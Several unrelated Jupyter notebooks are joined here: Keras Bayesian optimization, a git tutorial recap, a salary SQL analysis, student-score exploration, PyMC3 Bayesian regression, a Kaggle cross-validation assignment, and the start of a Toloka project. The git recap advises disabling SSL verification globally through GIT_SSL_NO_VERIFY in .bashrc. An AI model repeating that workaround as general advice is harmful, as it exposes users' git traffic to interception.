        y_test = y[test]

        model = generate_model(dropout, neuronPct, neuronShrink)
        model.compile(loss='categorical_crossentropy', optimizer=Adam(lr=lr))
        monitor = EarlyStopping(monitor='val_loss', min_delta=1e-3,
                                patience=100, verbose=0, mode='auto',
                                restore_best_weights=True)

        # Train on the bootstrap sample
        model.fit(x_train, y_train, validation_data=(x_test, y_test),
                  callbacks=[monitor], verbose=0, epochs=1000)
        epochs = monitor.stopped_epoch
        epochs_needed.append(epochs)

        # Predict on the out of boot (validation)
        pred = model.predict(x_test)

        # Measure this bootstrap's log loss
        y_compare = np.argmax(y_test, axis=1)  # For log loss calculation
        score = metrics.log_loss(y_compare, pred)
        mean_benchmark.append(score)
        m1 = statistics.mean(mean_benchmark)
        m2 = statistics.mean(epochs_needed)
        mdev = statistics.pstdev(mean_benchmark)

        # Record this iteration
        time_took = time.time() - start_time
        # print(f"#{num}: score={score:.6f}, mean score={m1:.6f}, stdev={mdev:.6f}, epochs={epochs}, mean epochs={int(m2)}, time={hms_string(time_took)}")

    tensorflow.keras.backend.clear_session()
    return (-m1)

print(evaluate_network(
    dropout=0.2,
    lr=1e-3,
    neuronPct=0.2,
    neuronShrink=0.2))
from bayes_opt import BayesianOptimization
import time

# Suppress NaN warnings, see: https://stackoverflow.com/questions/34955158/what-might-be-the-cause-of-invalid-value-encountered-in-less-equal-in-numpy
import warnings
warnings.filterwarnings("ignore", category=RuntimeWarning)

# Bounded region of parameter space
pbounds = {'dropout': (0.0, 0.499),
           'lr': (0.0, 0.1),
           'neuronPct': (0.01, 1),
           'neuronShrink': (0.01, 1)}

optimizer = BayesianOptimization(
    f=evaluate_network,
    pbounds=pbounds,
    verbose=2,  # verbose = 1 prints only when a maximum is observed, verbose = 0 is silent
    random_state=1,
)

start_time = time.time()
optimizer.maximize(init_points=10, n_iter=100)
time_took = time.time() - start_time

print(f"Total runtime: {hms_string(time_took)}")
print(optimizer.max)
```
{'target': -0.6500334282952827, 'params': {'dropout': 0.12771198428037775, 'lr': 0.0074010841641111965, 'neuronPct': 0.10774655638231533, 'neuronShrink': 0.2784788676498257}}
```
name = '2015-12-11-meeting-summary'
title = 'Introducing Git'
tags = 'git, github, version control'
author = 'Denis Sergeev'
from nb_tools import connect_notebook_to_post
from IPython.core.display import HTML
html = connect_notebook_to_post(name, title, tags, author)
```
Today we talked about git and its functionality for managing code, text documents and other building blocks of our research.
We followed a very good tutorial created by [**Software Carpentry**](http://swcarpentry.github.io/git-novice/). There are hundreds of other resources available online, for example, [**Git Real**](http://gitreal.codeschool.com/).
Hence, this post is not trying to be yet another git tutorial. Instead, below is just a brief recap of what commands were covered during the meeting.
## Setting Up Git
Set up your name and email so that each time you contribute to a project your commit has an author
`git config --global user.name "Python UEA"`
`git config --global user.email "python@uea.ac.uk"`
## Creating a Repository
Create a new directory for a project
`mkdir myproject`
Go into the newly created directory
`cd myproject`
Make the directory a Git repository
`git init`
Check status of the repository
`git status`
## Tracking Changes
Add a Python script to the repo (make the file staged for commit)
`git add awesome_script.py`
Commit changes with a meaningful message
`git commit -m "Add awesome script written in Python"`
## Exploring History
### Commits history
`git log`
### Comparing different versions of files
List all untracked changes in the repository
`git diff`
Differences with “head minus one”, i.e. previous, commit
`git diff HEAD~1 awesome_script.py`
Differences with a specific commit
`git diff <unique commit id> awesome_script.py`
## Ignoring Things
Create a .gitignore file containing the line '*.pyc', telling git to ignore all Python bytecode files
`echo '*.pyc' >> .gitignore`
Include .gitignore in the repository
`git add .gitignore`
`git commit -m "Add .gitignore file"`
`git status`
## Remotes in GitHub
`git remote add origin git@github.com:<username>/<repository_name>.git`
`git push -u origin master`
### Issue on Grace
If you use git on [Grace](http://rscs.uea.ac.uk/high-performance-computing) and have tried `git push` to a GitHub repository, you have probably encountered the following error:
`fatal: unable to access 'https://github.com/***/***/': error:0D0C50A1:asn1 encoding routines:ASN1_item_verify:unknown message digest algorithm`
One of the possible solutions here is to switch off SSL verification by adding the following line in your .bashrc file:
`export GIT_SSL_NO_VERIFY=true`
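As an alternative to the environment variable, Git's own configuration can disable verification with a narrower scope (a sketch; scoping it to one repository avoids turning verification off globally):

```shell
# Disable SSL verification for the current repository only
git config http.sslVerify false

# Or disable it for a single command without persisting anything
git -c http.sslVerify=false push origin master
```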
```
HTML(html)
```
|
github_jupyter
|
# Observations
1. The salaries are clustered at the low end, with a small number of very high salaries at the top.
2. This mimics the business model of a franchise restaurant, where most of the lower-end employees make minimum wage.
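The skew described above can be quantified with a single statistic; a minimal sketch on a hypothetical salary sample (the values below are made up for illustration):

```python
import numpy as np
import scipy.stats as sts

# Toy salary sample: many low values plus a few very high ones
salaries = np.array([30000.0, 32000.0, 31000.0, 30500.0, 33000.0, 250000.0, 300000.0])
skewness = sts.skew(salaries)
print(skewness)  # a positive value indicates a right-skewed distribution
```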
```
from sqlalchemy import create_engine, Table, Column, MetaData, Integer, Computed
from random import randint
import os
from dotenv import load_dotenv
import pandas as pd
import matplotlib.pyplot as plt
import numpy as np
from matplotlib import colors
from matplotlib.ticker import PercentFormatter
import scipy.stats as sts
# dialect+driver = 'postgres' for us, host probably = 'localhost' (for now), username defaults to 'postgres'
load_dotenv()
username=os.environ.get('DB_USERNAME')
password=os.environ.get('DB_PASSWORD')
connection_string= f'postgresql+psycopg2://{username}:{password}@localhost:5432/EmployeeDB'
def doQuery(query):  # READ
    return connection.execute(query).fetchall()
def doUpdate(updateQuery):  # CREATE, UPDATE, DELETE
    connection.execute(updateQuery)
connection = create_engine(connection_string).connect()
query = "select e.emp_no, e.emp_title_id, e.birthdate, e.first_name, e.last_name, e.sex, e.hire_date, t.title, s.salary \
from employee e, salary s, title t \
where e.emp_no = s.emp_no and \
e.emp_title_id = t.title_id"
queryResults = doQuery(query)
queryResults_df = pd.DataFrame(queryResults)
connection.close()
queryResults_df = queryResults_df.rename(columns={0:'Emp Number', 1:'Title ID', 2:'Birth Date',3:'First Name',4:'Last Name',5:'Gender',6:'Hire Date',7:'Title',8:'Salary'})
queryResults_df.head()
```
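Instead of renaming positional integer columns after the fact, the column names can be supplied when the DataFrame is built; a sketch with made-up rows standing in for the SQL query results:

```python
import pandas as pd

# Hypothetical rows standing in for the query output
rows = [(1, 'e001', 'Alice', 60000), (2, 'e002', 'Bob', 45000)]
df = pd.DataFrame(rows, columns=['Emp Number', 'Title ID', 'First Name', 'Salary'])
print(df.columns.tolist())
```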
Create a histogram to visualize the most common salary ranges for employees.
```
salary=queryResults_df["Salary"]
plt.hist(salary)
# Save before calling show(): show() clears the current figure,
# so saving afterwards would write out a blank image
plt.savefig("./Data Analysis/Images/SalaryHistogram.png")
plt.show()
print(sts.normaltest(salary.sample(50)))
# Demonstrate calculating measures of central tendency
mean_numpy = np.mean(salary)
print(f"The mean salary is {mean_numpy}")
median_numpy = np.median(salary)
print(f"The median salary is {median_numpy}")
mode_scipy = sts.mode(salary)
print(f"The mode salary is {mode_scipy}")
```
Create a bar chart of average salary by title.
```
connection = create_engine(connection_string).connect()
query = "select round(avg(s.salary)), t.title \
from employee e, salary s, title t \
where s.emp_no = e.emp_no and \
e.emp_title_id = t.title_id \
group by t.title"
queryResults2 = doQuery(query)
queryResults2_df = pd.DataFrame(queryResults2)
connection.close()
queryResults2_df = queryResults2_df.rename(columns={0:'Average Salary', 1:'Title'})
queryResults2_df
# Create a bar chart based upon the above data
average_salary=queryResults2_df['Average Salary']
x_axis = np.arange(len(average_salary))
plt.bar(x_axis, average_salary, color="b", align="center")
# Create the ticks for our bar chart's x axis
tick_locations = [value for value in x_axis]
plt.xticks(tick_locations, queryResults2_df['Title'], rotation=45)
# Set the limits of the x axis
plt.xlim(-0.75, len(x_axis)-0.25)
plt.ylim(0, max(average_salary)+10000)
# Give the chart a title, x label, and y label
plt.title("Average Salary by Title")
plt.xlabel("Titles")
plt.ylabel("Average Salary")
plt.savefig("./Data Analysis/Images/AverageSalaryByTitle.png")
plt.show()
```
|
github_jupyter
|
<a href="https://colab.research.google.com/github/MarceloClaro/python-business/blob/gh-pages/Avaliar_o_desempenho_de_um_aluno_usando_t%C3%A9cnicas_de_Machine_Learning_e_python.ipynb" target="_parent"><img src="https://colab.research.google.com/assets/colab-badge.svg" alt="Open In Colab"/></a>
# **STUDENT PERFORMANCE EVALUATION**
# Installing Python Libraries
```
# Libraries for some basic operations
import numpy as np
import pandas as pd
```
### The dabl library has to be installed in Colab
```
!pip install git+https://github.com/amueller/dabl/
# Libraries for visualizations
import matplotlib.pyplot as plt
import seaborn as sns
import plotly.express as px
import dabl
```
### Reading the dataset:
```
data = pd.read_csv("/content/Students.csv",encoding='ISO-8859-1')
# get the shape of the data
print(data.shape)
# (number of rows, number of columns or categories)
```
### Looking at the first 30 records in the dataset
```
data.head(30)
```
### Descriptive Statistics
```
data.describe()
#count = total number of rows
#mean = mean value
#std = standard deviation
#min = minimum value
#25% = 25th percentile
#50% = 50th percentile (median)
#75% = 75th percentile
#max = maximum value
```
### Checking the number of unique items present in the categorical columns.
```
data.select_dtypes('object').nunique()
```
### Checking the percentage of missing data in each column of the dataset:
```
no_of_rows = data.shape[0]
percentage_of_missing_data = data.isnull().sum()/no_of_rows
print(percentage_of_missing_data)
```
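The same per-column missing fraction can be computed more directly with `mean()`, since `True` counts as 1; a sketch on a toy frame:

```python
import numpy as np
import pandas as pd

# Toy frame: column 'a' has half its values missing, 'b' has none
df = pd.DataFrame({'a': [1.0, np.nan, 3.0, np.nan], 'b': [1, 2, 3, 4]})
missing_fraction = df.isnull().mean()
print(missing_fraction)
```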
### Comparing all other attributes against the math scores.
```
plt.rcParams['figure.figsize'] = (18, 6)
plt.style.use('fivethirtyeight')
dabl.plot(data, target_col = 'math score')
```
### Comparing all other attributes against the reading scores:
```
plt.rcParams['figure.figsize'] = (18, 6)
plt.style.use('fivethirtyeight')
dabl.plot(data, target_col = 'reading score')
```
### Checking the effect of lunch on student performance:
```
data[['lunch','gender','math score','writing score',
'reading score']].groupby(['lunch','gender']).agg('median')
```
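A toy version of the same `groupby(...).agg('median')` pattern, with made-up rows:

```python
import pandas as pd

# Hypothetical rows standing in for the students dataset
toy = pd.DataFrame({'lunch': ['standard', 'standard', 'free/reduced'],
                    'math score': [70, 80, 60]})
medians = toy.groupby('lunch').agg('median')
print(medians)
```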
### Checking the effect of the test preparation course on scores:
```
data[['test preparation course',
'gender',
'math score',
'writing score',
'reading score']].groupby(['test preparation course','gender']).agg('median')
```
# Data Visualizations
### Visualizing the number of males and females in the dataset
```
plt.rcParams['figure.figsize'] = (15, 5)
sns.countplot(data['gender'], palette = 'bone')
plt.title('Comparison of Males and Females', fontweight = 30)
plt.xlabel('Gender')
plt.ylabel('Count')
plt.show()
```
### Visualizing the different groups in the dataset:
```
plt.rcParams['figure.figsize'] = (15, 9)
plt.style.use('ggplot')
sns.countplot(data['race/ethnicity'], palette = 'pink')
plt.title('Comparison of various groups', fontweight = 30, fontsize = 20)
plt.xlabel('Groups')
plt.ylabel('count')
plt.show()
```
### Visualizing the different levels of parental education:
```
plt.rcParams['figure.figsize'] = (15, 9)
plt.style.use('fivethirtyeight')
sns.countplot(data['parental level of education'], palette = 'Blues')
plt.title('Comparison of Parental Education', fontweight = 30, fontsize = 20)
plt.xlabel('Degree')
plt.ylabel('count')
plt.show()
```
|
github_jupyter
|
# Basic Bayesian Linear Regression Implementation
```
# Pandas and numpy for data manipulation
import pandas as pd
import numpy as np
# Matplotlib and seaborn for visualization
import matplotlib.pyplot as plt
%matplotlib inline
import seaborn as sns
# Linear Regression to verify implementation
from sklearn.linear_model import LinearRegression
# Scipy for statistics
import scipy
# PyMC3 for Bayesian Inference
import pymc3 as pm
```
# Load in Exercise Data
```
exercise = pd.read_csv('data/exercise.csv')
calories = pd.read_csv('data/calories.csv')
df = pd.merge(exercise, calories, on = 'User_ID')
df = df[df['Calories'] < 300]
df = df.reset_index()
df['Intercept'] = 1
df.head()
```
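A minimal sketch of the inner merge used above, on hypothetical frames keyed by `User_ID`:

```python
import pandas as pd

# Toy stand-ins for exercise.csv and calories.csv
exercise = pd.DataFrame({'User_ID': [1, 2], 'Duration': [10, 20]})
calories = pd.DataFrame({'User_ID': [1, 2], 'Calories': [80, 160]})

# Inner merge on the shared key combines the columns of both frames
merged = pd.merge(exercise, calories, on='User_ID')
print(merged.shape)  # (2, 3)
```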
# Plot Relationship
```
plt.figure(figsize=(8, 8))
plt.plot(df['Duration'], df['Calories'], 'bo');
plt.xlabel('Duration (min)', size = 18); plt.ylabel('Calories', size = 18);
plt.title('Calories burned vs Duration of Exercise', size = 20);
# Create the features and response
X = df.loc[:, ['Intercept', 'Duration']]
y = df.loc[:, 'Calories']  # .ix was removed from pandas; use .loc instead
```
# Implement Ordinary Least Squares Linear Regression by Hand
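The hand-rolled implementation in this section solves the ordinary least squares problem in closed form via the normal equations:

$$\hat{\beta} = \left(X^\top X\right)^{-1} X^\top y$$

where $X$ is the feature matrix (with the intercept as its first column) and $y$ is the response vector.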
```
# Takes a matrix of features (with intercept as first column)
# and response vector and calculates linear regression coefficients
def linear_regression(X, y):
# Equation for linear regression coefficients
beta = np.matmul(np.matmul(np.linalg.inv(np.matmul(X.T, X)), X.T), y)
return beta
# Run the by hand implementation
by_hand_coefs = linear_regression(X, y)
print('Intercept calculated by hand:', by_hand_coefs[0])
print('Slope calculated by hand: ', by_hand_coefs[1])
xs = np.linspace(4, 31, 1000)
ys = by_hand_coefs[0] + by_hand_coefs[1] * xs
plt.figure(figsize=(8, 8))
plt.plot(df['Duration'], df['Calories'], 'bo', label = 'observations', alpha = 0.8);
plt.xlabel('Duration (min)', size = 18); plt.ylabel('Calories', size = 18);
plt.plot(xs, ys, 'r--', label = 'OLS Fit', linewidth = 3)
plt.legend(prop={'size': 16})
plt.title('Calories burned vs Duration of Exercise', size = 20);
```
## Prediction for Datapoint
```
print('Exercising for 15.5 minutes will burn an estimated {:.2f} calories.'.format(
by_hand_coefs[0] + by_hand_coefs[1] * 15.5))
```
# Verify with Scikit-learn Implementation
```
# Create the model and fit on the data
lr = LinearRegression()
lr.fit(X.Duration.values.reshape(-1, 1), y)  # reshape the underlying array; Series.reshape was removed
print('Intercept from library:', lr.intercept_)
print('Slope from library:', lr.coef_[0])
```
# Bayesian Linear Regression
### PyMC3 for Bayesian Inference
Implement MCMC to find the posterior distribution of the model parameters. Rather than a single point estimate of the model weights, Bayesian linear regression will give us a posterior distribution for the model weights.
## Model with 500 Observations
```
with pm.Model() as linear_model_500:
# Intercept
intercept = pm.Normal('Intercept', mu = 0, sd = 10)
# Slope
slope = pm.Normal('slope', mu = 0, sd = 10)
# Standard deviation
sigma = pm.HalfNormal('sigma', sd = 10)
# Estimate of mean
mean = intercept + slope * X.loc[0:499, 'Duration']
# Observed values
Y_obs = pm.Normal('Y_obs', mu = mean, sd = sigma, observed = y.values[0:500])
# Sampler
step = pm.NUTS()
# Posterior distribution
linear_trace_500 = pm.sample(1000, step)
```
## Model with all Observations
```
with pm.Model() as linear_model:
# Intercept
intercept = pm.Normal('Intercept', mu = 0, sd = 10)
# Slope
slope = pm.Normal('slope', mu = 0, sd = 10)
# Standard deviation
sigma = pm.HalfNormal('sigma', sd = 10)
# Estimate of mean
mean = intercept + slope * X.loc[:, 'Duration']
# Observed values
Y_obs = pm.Normal('Y_obs', mu = mean, sd = sigma, observed = y.values)
# Sampler
step = pm.NUTS()
# Posterior distribution
linear_trace = pm.sample(1000, step)
```
# Bayesian Model Results
The Bayesian Model provides more opportunities for interpretation than the ordinary least squares regression because it provides a posterior distribution. We can use this distribution to find the most likely single value as well as the entire range of likely values for our model parameters.
PyMC3 has many built in tools for visualizing and inspecting model runs. These let us see the distributions and provide estimates with a level of uncertainty, which should be a necessary part of any model.
## Trace of All Model Parameters
```
pm.traceplot(linear_trace, figsize = (12, 12));
```
## Posterior Distribution of Model Parameters
```
pm.plot_posterior(linear_trace, figsize = (12, 10), text_size = 20);
```
## Confidence Intervals for Model Parameters
```
pm.forestplot(linear_trace);
```
# Predictions of Response Sampled from the Posterior
We can now generate predictions of the linear regression line using the model results. The following plot shows 1000 different estimates of the regression line drawn from the posterior. The distribution of the lines gives an estimate of the uncertainty in the estimate. Bayesian Linear Regression has the benefit that it gives us a posterior __distribution__ rather than a __single point estimate__ in the frequentist ordinary least squares regression.
## All Observations
```
plt.figure(figsize = (8, 8))
pm.plot_posterior_predictive_glm(linear_trace, samples = 100, eval=np.linspace(2, 30, 100), linewidth = 1,
color = 'red', alpha = 0.8, label = 'Bayesian Posterior Fits',
lm = lambda x, sample: sample['Intercept'] + sample['slope'] * x);
plt.scatter(X['Duration'], y.values, s = 12, alpha = 0.8, c = 'blue', label = 'Observations')
plt.plot(X['Duration'], by_hand_coefs[0] + X['Duration'] * by_hand_coefs[1], 'k--', label = 'OLS Fit', linewidth = 1.4)
plt.title('Posterior Predictions with all Observations', size = 20); plt.xlabel('Duration (min)', size = 18);
plt.ylabel('Calories', size = 18);
plt.legend(prop={'size': 16});
pm.df_summary(linear_trace)
```
## Limited Observations
```
plt.figure(figsize = (8, 8))
pm.plot_posterior_predictive_glm(linear_trace_500, samples = 100, eval=np.linspace(2, 30, 100), linewidth = 1,
color = 'red', alpha = 0.8, label = 'Bayesian Posterior Fits',
lm = lambda x, sample: sample['Intercept'] + sample['slope'] * x);
plt.scatter(X['Duration'][:500], y.values[:500], s = 12, alpha = 0.8, c = 'blue', label = 'Observations')
plt.plot(X['Duration'], by_hand_coefs[0] + X['Duration'] * by_hand_coefs[1], 'k--', label = 'OLS Fit', linewidth = 1.4)
plt.title('Posterior Predictions with Limited Observations', size = 20); plt.xlabel('Duration (min)', size = 18);
plt.ylabel('Calories', size = 18);
plt.legend(prop={'size': 16});
pm.df_summary(linear_trace_500)
```
# Specific Prediction for One Datapoint
```
bayes_prediction = linear_trace['Intercept'] + linear_trace['slope'] * 15.5
plt.figure(figsize = (8, 8))
plt.style.use('fivethirtyeight')
sns.kdeplot(bayes_prediction, label = 'Bayes Posterior Prediction')
plt.vlines(x = by_hand_coefs[0] + by_hand_coefs[1] * 15.5,
ymin = 0, ymax = 2.5,
label = 'OLS Prediction',
colors = 'red', linestyles='--')
plt.legend();
plt.xlabel('Calories Burned', size = 18), plt.ylabel('Probability Density', size = 18);
plt.title('Posterior Prediction for 15.5 Minutes', size = 20);
```
|
github_jupyter
|
<a href="https://colab.research.google.com/github/hoops92/DS-Unit-2-Kaggle-Challenge/blob/master/module3-cross-validation/Scott_LS_DS10_223_assignment.ipynb" target="_parent"><img src="https://colab.research.google.com/assets/colab-badge.svg" alt="Open In Colab"/></a>
Lambda School Data Science
*Unit 2, Sprint 2, Module 3*
---
# Cross-Validation
## Assignment
- [ ] [Review requirements for your portfolio project](https://lambdaschool.github.io/ds/unit2), then submit your dataset.
- [ ] Continue to participate in our Kaggle challenge.
- [ ] Use scikit-learn for hyperparameter optimization with RandomizedSearchCV.
- [ ] Submit your predictions to our Kaggle competition. (Go to our Kaggle InClass competition webpage. Use the blue **Submit Predictions** button to upload your CSV file. Or you can use the Kaggle API to submit your predictions.)
- [ ] Commit your notebook to your fork of the GitHub repo.
You won't be able to just copy from the lesson notebook to this assignment.
- Because the lesson was ***regression***, but the assignment is ***classification.***
- Because the lesson used [TargetEncoder](https://contrib.scikit-learn.org/categorical-encoding/targetencoder.html), which doesn't work as-is for _multi-class_ classification.
So you will have to adapt the example, which is good real-world practice.
1. Use a model for classification, such as [RandomForestClassifier](https://scikit-learn.org/stable/modules/generated/sklearn.ensemble.RandomForestClassifier.html)
2. Use hyperparameters that match the classifier, such as `randomforestclassifier__ ...`
3. Use a metric for classification, such as [`scoring='accuracy'`](https://scikit-learn.org/stable/modules/model_evaluation.html#common-cases-predefined-values)
4. If you’re doing a multi-class classification problem — such as whether a waterpump is functional, functional needs repair, or nonfunctional — then use a categorical encoding that works for multi-class classification, such as [OrdinalEncoder](https://contrib.scikit-learn.org/categorical-encoding/ordinal.html) (not [TargetEncoder](https://contrib.scikit-learn.org/categorical-encoding/targetencoder.html))
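The four adaptations above can be sketched as a minimal classification pipeline. This is an illustration on synthetic data, not the competition dataset, and the categorical encoding step is omitted because the toy features are already numeric:

```python
import numpy as np
import pandas as pd
from sklearn.ensemble import RandomForestClassifier
from sklearn.impute import SimpleImputer
from sklearn.model_selection import cross_val_score
from sklearn.pipeline import make_pipeline

# Synthetic stand-in for the waterpump data
rng = np.random.default_rng(42)
X = pd.DataFrame({'f1': rng.normal(size=300), 'f2': rng.normal(size=300)})
y = rng.choice(['functional', 'functional needs repair', 'non functional'], size=300)

# A classifier and a classification metric, per the checklist above
pipeline = make_pipeline(
    SimpleImputer(strategy='median'),
    RandomForestClassifier(n_estimators=50, random_state=42),
)
scores = cross_val_score(pipeline, X, y, cv=3, scoring='accuracy')
print(scores.shape)
```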
## Stretch Goals
### Reading
- Jake VanderPlas, [Python Data Science Handbook, Chapter 5.3](https://jakevdp.github.io/PythonDataScienceHandbook/05.03-hyperparameters-and-model-validation.html), Hyperparameters and Model Validation
- Jake VanderPlas, [Statistics for Hackers](https://speakerdeck.com/jakevdp/statistics-for-hackers?slide=107)
- Ron Zacharski, [A Programmer's Guide to Data Mining, Chapter 5](http://guidetodatamining.com/chapter5/), 10-fold cross validation
- Sebastian Raschka, [A Basic Pipeline and Grid Search Setup](https://github.com/rasbt/python-machine-learning-book/blob/master/code/bonus/svm_iris_pipeline_and_gridsearch.ipynb)
- Peter Worcester, [A Comparison of Grid Search and Randomized Search Using Scikit Learn](https://blog.usejournal.com/a-comparison-of-grid-search-and-randomized-search-using-scikit-learn-29823179bc85)
### Doing
- Add your own stretch goals!
- Try other [categorical encodings](https://contrib.scikit-learn.org/categorical-encoding/). See the previous assignment notebook for details.
- In addition to `RandomizedSearchCV`, scikit-learn has [`GridSearchCV`](https://scikit-learn.org/stable/modules/generated/sklearn.model_selection.GridSearchCV.html). Another library called scikit-optimize has [`BayesSearchCV`](https://scikit-optimize.github.io/notebooks/sklearn-gridsearchcv-replacement.html). Experiment with these alternatives.
- _[Introduction to Machine Learning with Python](http://shop.oreilly.com/product/0636920030515.do)_ discusses options for "Grid-Searching Which Model To Use" in Chapter 6:
> You can even go further in combining GridSearchCV and Pipeline: it is also possible to search over the actual steps being performed in the pipeline (say whether to use StandardScaler or MinMaxScaler). This leads to an even bigger search space and should be considered carefully. Trying all possible solutions is usually not a viable machine learning strategy. However, here is an example comparing a RandomForestClassifier and an SVC ...
The example is shown in [the accompanying notebook](https://github.com/amueller/introduction_to_ml_with_python/blob/master/06-algorithm-chains-and-pipelines.ipynb), code cells 35-37. Could you apply this concept to your own pipelines?
### BONUS: Stacking!
Here's some code you can use to "stack" multiple submissions, which is another form of ensembling:
```python
import pandas as pd
# Filenames of your submissions you want to ensemble
files = ['submission-01.csv', 'submission-02.csv', 'submission-03.csv']
target = 'status_group'
submissions = (pd.read_csv(file)[[target]] for file in files)
ensemble = pd.concat(submissions, axis='columns')
majority_vote = ensemble.mode(axis='columns')[0]
sample_submission = pd.read_csv('sample_submission.csv')
submission = sample_submission.copy()
submission[target] = majority_vote
submission.to_csv('my-ultimate-ensemble-submission.csv', index=False)
```
```
%%capture
import sys
# If you're on Colab:
if 'google.colab' in sys.modules:
DATA_PATH = 'https://raw.githubusercontent.com/LambdaSchool/DS-Unit-2-Kaggle-Challenge/master/data/'
!pip install category_encoders==2.*
# If you're working locally:
else:
DATA_PATH = '../data/'
import pandas as pd
# Merge train_features.csv & train_labels.csv
train = pd.merge(pd.read_csv(DATA_PATH+'waterpumps/train_features.csv'),
pd.read_csv(DATA_PATH+'waterpumps/train_labels.csv'))
# Read test_features.csv & sample_submission.csv
test = pd.read_csv(DATA_PATH+'waterpumps/test_features.csv')
sample_submission = pd.read_csv(DATA_PATH+'waterpumps/sample_submission.csv')
```
## Define a function to wrangle train, validate, and test sets in the same way. Clean outliers and engineer features.
```
import numpy as np
def wrangle(X):
"""Wrangle train, validate, and test sets in the same way"""
# Prevent SettingWithCopyWarning
X = X.copy()
# About 3% of the time, latitude has small values near zero,
# outside Tanzania, so we'll treat these values like zero.
X['latitude'] = X['latitude'].replace(-2e-08, 0)
# When columns have zeros and shouldn't, they are like null values.
# So we will replace the zeros with nulls, and impute missing values later.
cols_with_zeros = ['longitude', 'latitude', 'construction_year',
'gps_height','population','amount_tsh']
for col in cols_with_zeros:
X[col] = X[col].replace(0, np.nan)
X[col+'_MISSING'] = X[col].isnull()
# Approximate distance from 'Null Island'
X['distance'] = ((X['latitude']+10.99846435)**2 + (X['longitude']-19.6071219)**2)**.5
# Convert to datetime and create year_ month_ & day_recorded
X['date_recorded'] = pd.to_datetime(X['date_recorded'], infer_datetime_format=True)
X['year_recorded'] = X['date_recorded'].dt.year
X['month_recorded'] = X['date_recorded'].dt.month
X['day_recorded'] = X['date_recorded'].dt.day
X = X.drop(columns='date_recorded')
# Engineer feature: how many years from construction_year to date_recorded
X['years'] = X['year_recorded'] - X['construction_year']
X['years_MISSING'] = X['years'].isnull()
# region_code & district_code are numeric columns, but should be categorical features,
# so convert it from a number to a string
X['region_code'] = X['region_code'].astype(str)
X['district_code'] = X['district_code'].astype(str)
# quantity & quantity_group are duplicates, so drop one
X = X.drop(columns='quantity_group')
# source, source_class & source_type are almost identical.
# source has higher level of detail.
X = X.drop(columns=['source_class','source_type'])
# recorded_by has single value, so drop.
X = X.drop(columns='recorded_by')
X = X.drop(columns='id')
# water_quality & quality_group are almost identical.
# water_quality has higher level of detail.
X = X.drop(columns='quality_group')
# waterpoint_type & waterpoint_type_group are almost identical.
# waterpoint_type has higher level of detail.
X = X.drop(columns='waterpoint_type_group')
# payment & payment_type are duplicates, so drop one
X = X.drop(columns='payment_type')
# extraction_type, extraction_type_class & extraction_type_group are almost identical.
# extraction_type has higher level of detail.
X = X.drop(columns=['extraction_type_class','extraction_type_group'])
# installer & funder are almost identical.
# funder has higher level of detail.
X = X.drop(columns='installer')
# management & management_group are almost identical.
# management has higher level of detail.
X = X.drop(columns='management_group')
# region_code & region are almost identical.
# region_code has higher level of detail.
X = X.drop(columns='region')
# return the wrangled dataframe
return X
train = wrangle(train)
test = wrangle(test)
```
## Use scikit-learn for hyperparameter optimization with RandomizedSearchCV.
```
pip install category_encoders
import category_encoders as ce
from sklearn.impute import SimpleImputer
from sklearn.model_selection import cross_val_score
from sklearn.pipeline import make_pipeline
from sklearn.ensemble import RandomForestClassifier
from sklearn.model_selection import RandomizedSearchCV
from scipy.stats import randint, uniform
%%time
target = 'status_group'
features = train.columns.drop(target)
X_train = train[features]
y_train = train[target]
pipeline = make_pipeline(
ce.OrdinalEncoder(),
SimpleImputer(strategy='median'),
RandomForestClassifier(n_estimators=100, max_depth=22, n_jobs=-1, random_state=42)
)
k = 5
scores = cross_val_score(pipeline, X_train, y_train, cv=k,
scoring='accuracy')
print(f'Accuracy for {k} folds:', scores)
%%time
target = 'status_group'
features = train.columns.drop(target)
X_train = train[features]
y_train = train[target]
# y_train_pre = train[target]
# # Encode target feature, in order to use encoders like Target Encoder
# encoder = ce.OrdinalEncoder()
# y_train = encoder.fit_transform(y_train_pre)
pipeline = make_pipeline(
ce.OrdinalEncoder(),
SimpleImputer(strategy='median'),
RandomForestClassifier(n_estimators=100, max_depth=22, n_jobs=-1, random_state=42)
)
param_distributions = {
# 'targetencoder__min_samples_leaf': randint(1, 15),
# 'targetencoder__smoothing': uniform(1, 50),
# 'simpleimputer__strategy': ['mean', 'median'],
# 'randomforestclassifier__n_estimators': randint(80, 120),
# 'randomforestclassifier__max_depth': range(16, 24),
'randomforestclassifier__max_features': uniform(0.2, 0.8),
'randomforestclassifier__criterion': ['gini', 'entropy'],
}
# If you're on Colab, decrease n_iter & cv parameters
search = RandomizedSearchCV(
pipeline,
param_distributions=param_distributions,
n_iter=10,
cv=5,
scoring='accuracy',
verbose=10,
return_train_score=True,
n_jobs=-1
)
search.fit(X_train, y_train);
print('Best hyperparameters', search.best_params_)
print('Cross-validation Accuracy', search.best_score_)
pd.DataFrame(search.cv_results_).sort_values(by='rank_test_score').T
```
## Submit your predictions to DS10 Kaggle competition.
```
pipeline = search.best_estimator_
y_pred = pipeline.predict(test)
# Makes a dataframe with two columns, id and status_group,
# and writes to a csv file, without the index
# sample_submission = pd.read_csv('sample_submission.csv')
submission = sample_submission.copy()
submission['status_group'] = y_pred
submission.to_csv('your-submission-filename.csv', index=False)
# from google.colab import files
# files.download('your-submission-filename.csv')
```
|
github_jupyter
|
# Text recognition
We have a set of water meter images. We need to get each water meter’s readings. We ask performers to look at the images and write down the digits on each water meter.
To get acquainted with Toloka tools for free, you can use the promo code **TOLOKAKIT1** for $20 on your [profile page](https://toloka.yandex.com/requester/profile?utm_source=github&utm_medium=site&utm_campaign=tolokakit) after registration.
Prepare the environment and import everything we'll need.
```
!pip install toloka-kit==0.1.15
!pip install crowd-kit==0.0.7
!pip install ipyplot
import datetime
import os
import sys
import time
import logging
import ipyplot
import pandas
import numpy as np
import toloka.client as toloka
import toloka.client.project.template_builder as tb
from crowdkit.aggregation import ROVER
logging.basicConfig(
format='[%(levelname)s] %(name)s: %(message)s',
level=logging.INFO,
stream=sys.stdout,
)
```
Create a toloka-client instance. All API calls will go through it. More about the OAuth token in our [Learn the basics example](https://github.com/Toloka/toloka-kit/tree/main/examples/0.getting_started/0.learn_the_basics) [](https://colab.research.google.com/github/Toloka/toloka-kit/blob/main/examples/0.getting_started/0.learn_the_basics/learn_the_basics.ipynb)
```
toloka_client = toloka.TolokaClient(input("Enter your token:"), 'PRODUCTION') # Or switch to 'SANDBOX'
logging.info(toloka_client.get_requester())
```
## Creating new project
Enter a clear project name and description.
> The project name and description will be visible to the performers.
```
project = toloka.Project(
public_name='Write down the digits in an image',
public_description='Look at the image and write down the digits shown on the water meter.',
)
